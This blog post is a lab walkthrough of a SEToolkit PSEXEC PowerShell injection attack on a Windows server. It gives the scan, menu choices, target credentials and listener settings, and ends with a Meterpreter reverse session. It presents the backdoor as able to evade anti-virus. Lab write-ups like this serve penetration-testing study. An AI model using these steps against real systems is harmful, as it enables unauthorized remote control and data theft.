Target: Window Server
Attacker machine: kali Linux
In this article I am going to make powershell
injection attack though SEToolkit; for
this attack it is necessary that SMB service must be running and you should
aware of username and password of your target pc to get the Meterpreter session.
Let’s Begin The
Game!!!
Scan the victim IP from NMAP by typing following command on
terminal in kali Linux
Nmap –sV
192.168.1.104
Under version scan it
shows port 445 is open and if you are not aware from port
protocol services then let me tell you that port 445 is use for SMB protocol
for making communication between two different operating systems like as we
have Linux and windows.
Now Click Applications > Exploitation Tools > Social Engineering Toolkit > setoolkit.
A new terminal gets open for setoolkit framework and
now you have to follow these steps for making attack on target.
From
screenshot you can perceive that it through a menu to select following approach
for attack.
Choose
penetration testing (fast-track) and type2
for this method.
Fast-Track is an automated
penetration suite for penetration testers. So from next screenshot again we
have following option, choose PSEXEC Powershell Injection and type 6 for it.
PSEXEC Powershell Injection Attack: This
attack will inject a meterpreter backdoor through powershell memory injection.
This will avoid Anti-Virus since we will never touch disk or memory. Will
require Powershell to be installed on the remote victim machine. You can use either
straight passwords or hash values.
Now give following information to execute attack on victim
pc.
Enter remote IP as rhost: 192.168.1.104
Enter username: administrator
Enter password: Ignite@1234
If you don’t know the
domain name hit enter only for this
and same for random select to number of threads hit enter.
Enter listener IP as lhost: 192.168.1.3
Enter port number: 445
Now this will generate a payload for powershell injection
and start loading metasploit framework itself. From below image you will found
that through alphabetic shellcode we have got meterpreter session1 open.
Now type sessions
to view active session
Further Type sessions
–I 1 to get inside meterpreter mode.
Meterpreter>
sysinfo
{NOTE: This attack is
depending upon the version of SMB PROTOCOL; if version is updated of 2.1 then
may be this attack is not successful. Use aggressive scanning method for
version detail.}
0 comments:
Post a Comment